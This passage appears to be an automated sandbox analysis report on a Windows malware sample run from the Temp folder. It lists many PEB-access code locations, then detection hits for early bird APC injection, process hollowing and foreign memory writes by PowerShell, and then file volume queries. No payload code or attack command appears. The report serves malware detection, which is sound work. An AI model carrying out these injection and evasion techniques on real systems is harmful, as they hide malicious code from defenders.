Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F89B3 mov esi, dword ptr fs:[00000030h]	11_2_211F89B3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F89B3 mov eax, dword ptr fs:[00000030h]	11_2_211F89B3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211F89B3 mov eax, dword ptr fs:[00000030h]	11_2_211F89B3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211829A0 mov eax, dword ptr fs:[00000030h]	11_2_211829A0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211709AD mov eax, dword ptr fs:[00000030h]	11_2_211709AD
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211709AD mov eax, dword ptr fs:[00000030h]	11_2_211709AD
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A9D0 mov eax, dword ptr fs:[00000030h]	11_2_2117A9D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A9D0 mov eax, dword ptr fs:[00000030h]	11_2_2117A9D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A9D0 mov eax, dword ptr fs:[00000030h]	11_2_2117A9D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A9D0 mov eax, dword ptr fs:[00000030h]	11_2_2117A9D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A9D0 mov eax, dword ptr fs:[00000030h]	11_2_2117A9D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117A9D0 mov eax, dword ptr fs:[00000030h]	11_2_2117A9D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A49D0 mov eax, dword ptr fs:[00000030h]	11_2_211A49D0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212069C0 mov eax, dword ptr fs:[00000030h]	11_2_212069C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A29F9 mov eax, dword ptr fs:[00000030h]	11_2_211A29F9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A29F9 mov eax, dword ptr fs:[00000030h]	11_2_211A29F9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123A9D3 mov eax, dword ptr fs:[00000030h]	11_2_2123A9D3
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FE9E0 mov eax, dword ptr fs:[00000030h]	11_2_211FE9E0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FC810 mov eax, dword ptr fs:[00000030h]	11_2_211FC810
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121483A mov eax, dword ptr fs:[00000030h]	11_2_2121483A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121483A mov eax, dword ptr fs:[00000030h]	11_2_2121483A
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AA830 mov eax, dword ptr fs:[00000030h]	11_2_211AA830
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21192835 mov eax, dword ptr fs:[00000030h]	11_2_21192835
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21192835 mov eax, dword ptr fs:[00000030h]	11_2_21192835
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21192835 mov eax, dword ptr fs:[00000030h]	11_2_21192835
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21192835 mov ecx, dword ptr fs:[00000030h]	11_2_21192835
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21192835 mov eax, dword ptr fs:[00000030h]	11_2_21192835
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21192835 mov eax, dword ptr fs:[00000030h]	11_2_21192835
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21174859 mov eax, dword ptr fs:[00000030h]	11_2_21174859
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21174859 mov eax, dword ptr fs:[00000030h]	11_2_21174859
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A0854 mov eax, dword ptr fs:[00000030h]	11_2_211A0854
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21206870 mov eax, dword ptr fs:[00000030h]	11_2_21206870
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21206870 mov eax, dword ptr fs:[00000030h]	11_2_21206870
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21182840 mov ecx, dword ptr fs:[00000030h]	11_2_21182840
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FE872 mov eax, dword ptr fs:[00000030h]	11_2_211FE872
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FE872 mov eax, dword ptr fs:[00000030h]	11_2_211FE872
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FC89D mov eax, dword ptr fs:[00000030h]	11_2_211FC89D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21170887 mov eax, dword ptr fs:[00000030h]	11_2_21170887
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123A8E4 mov eax, dword ptr fs:[00000030h]	11_2_2123A8E4
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119E8C0 mov eax, dword ptr fs:[00000030h]	11_2_2119E8C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AC8F9 mov eax, dword ptr fs:[00000030h]	11_2_211AC8F9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211AC8F9 mov eax, dword ptr fs:[00000030h]	11_2_211AC8F9
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_212408C0 mov eax, dword ptr fs:[00000030h]	11_2_212408C0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EEB1D mov eax, dword ptr fs:[00000030h]	11_2_211EEB1D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EEB1D mov eax, dword ptr fs:[00000030h]	11_2_211EEB1D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EEB1D mov eax, dword ptr fs:[00000030h]	11_2_211EEB1D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EEB1D mov eax, dword ptr fs:[00000030h]	11_2_211EEB1D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EEB1D mov eax, dword ptr fs:[00000030h]	11_2_211EEB1D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EEB1D mov eax, dword ptr fs:[00000030h]	11_2_211EEB1D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EEB1D mov eax, dword ptr fs:[00000030h]	11_2_211EEB1D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EEB1D mov eax, dword ptr fs:[00000030h]	11_2_211EEB1D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211EEB1D mov eax, dword ptr fs:[00000030h]	11_2_211EEB1D
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21238B28 mov eax, dword ptr fs:[00000030h]	11_2_21238B28
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21238B28 mov eax, dword ptr fs:[00000030h]	11_2_21238B28
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244B00 mov eax, dword ptr fs:[00000030h]	11_2_21244B00
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119EB20 mov eax, dword ptr fs:[00000030h]	11_2_2119EB20
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119EB20 mov eax, dword ptr fs:[00000030h]	11_2_2119EB20
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21168B50 mov eax, dword ptr fs:[00000030h]	11_2_21168B50
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21206B40 mov eax, dword ptr fs:[00000030h]	11_2_21206B40
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21206B40 mov eax, dword ptr fs:[00000030h]	11_2_21206B40
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2123AB40 mov eax, dword ptr fs:[00000030h]	11_2_2123AB40
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21218B42 mov eax, dword ptr fs:[00000030h]	11_2_21218B42
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2116CB7E mov eax, dword ptr fs:[00000030h]	11_2_2116CB7E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21224B4B mov eax, dword ptr fs:[00000030h]	11_2_21224B4B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21224B4B mov eax, dword ptr fs:[00000030h]	11_2_21224B4B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121EB50 mov eax, dword ptr fs:[00000030h]	11_2_2121EB50
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21242B57 mov eax, dword ptr fs:[00000030h]	11_2_21242B57
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21242B57 mov eax, dword ptr fs:[00000030h]	11_2_21242B57
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21242B57 mov eax, dword ptr fs:[00000030h]	11_2_21242B57
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21242B57 mov eax, dword ptr fs:[00000030h]	11_2_21242B57
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21224BB0 mov eax, dword ptr fs:[00000030h]	11_2_21224BB0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21224BB0 mov eax, dword ptr fs:[00000030h]	11_2_21224BB0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180BBE mov eax, dword ptr fs:[00000030h]	11_2_21180BBE
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180BBE mov eax, dword ptr fs:[00000030h]	11_2_21180BBE
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21190BCB mov eax, dword ptr fs:[00000030h]	11_2_21190BCB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21190BCB mov eax, dword ptr fs:[00000030h]	11_2_21190BCB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21190BCB mov eax, dword ptr fs:[00000030h]	11_2_21190BCB
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21170BCD mov eax, dword ptr fs:[00000030h]	11_2_21170BCD
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21170BCD mov eax, dword ptr fs:[00000030h]	11_2_21170BCD
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21170BCD mov eax, dword ptr fs:[00000030h]	11_2_21170BCD
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119EBFC mov eax, dword ptr fs:[00000030h]	11_2_2119EBFC
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21178BF0 mov eax, dword ptr fs:[00000030h]	11_2_21178BF0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21178BF0 mov eax, dword ptr fs:[00000030h]	11_2_21178BF0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21178BF0 mov eax, dword ptr fs:[00000030h]	11_2_21178BF0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FCBF0 mov eax, dword ptr fs:[00000030h]	11_2_211FCBF0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121EBD0 mov eax, dword ptr fs:[00000030h]	11_2_2121EBD0
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211FCA11 mov eax, dword ptr fs:[00000030h]	11_2_211FCA11
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211ACA38 mov eax, dword ptr fs:[00000030h]	11_2_211ACA38
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21194A35 mov eax, dword ptr fs:[00000030h]	11_2_21194A35
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21194A35 mov eax, dword ptr fs:[00000030h]	11_2_21194A35
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2119EA2E mov eax, dword ptr fs:[00000030h]	11_2_2119EA2E
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211ACA24 mov eax, dword ptr fs:[00000030h]	11_2_211ACA24
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2121EA60 mov eax, dword ptr fs:[00000030h]	11_2_2121EA60
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180A5B mov eax, dword ptr fs:[00000030h]	11_2_21180A5B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21180A5B mov eax, dword ptr fs:[00000030h]	11_2_21180A5B
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176A50 mov eax, dword ptr fs:[00000030h]	11_2_21176A50
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176A50 mov eax, dword ptr fs:[00000030h]	11_2_21176A50
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176A50 mov eax, dword ptr fs:[00000030h]	11_2_21176A50
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176A50 mov eax, dword ptr fs:[00000030h]	11_2_21176A50
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176A50 mov eax, dword ptr fs:[00000030h]	11_2_21176A50
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176A50 mov eax, dword ptr fs:[00000030h]	11_2_21176A50
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21176A50 mov eax, dword ptr fs:[00000030h]	11_2_21176A50
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211ECA72 mov eax, dword ptr fs:[00000030h]	11_2_211ECA72
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211ECA72 mov eax, dword ptr fs:[00000030h]	11_2_211ECA72
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211ACA6F mov eax, dword ptr fs:[00000030h]	11_2_211ACA6F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211ACA6F mov eax, dword ptr fs:[00000030h]	11_2_211ACA6F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211ACA6F mov eax, dword ptr fs:[00000030h]	11_2_211ACA6F
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_211A8A90 mov edx, dword ptr fs:[00000030h]	11_2_211A8A90
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80 mov eax, dword ptr fs:[00000030h]	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80 mov eax, dword ptr fs:[00000030h]	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80 mov eax, dword ptr fs:[00000030h]	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80 mov eax, dword ptr fs:[00000030h]	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80 mov eax, dword ptr fs:[00000030h]	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80 mov eax, dword ptr fs:[00000030h]	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80 mov eax, dword ptr fs:[00000030h]	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80 mov eax, dword ptr fs:[00000030h]	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_2117EA80 mov eax, dword ptr fs:[00000030h]	11_2_2117EA80
Source: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe	Code function: 11_2_21244A80 mov eax, dword ptr fs:[00000030h]	11_2_21244A80

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Early bird code injection technique detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Thread APC queued: target process: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe base: 1660000

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Users\user\AppData\Local\Temp\Bldtvandsfiltrene166.exe "C:\Users\user~1\AppData\Local\Temp\Bldtvandsfiltrene166.exe"

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
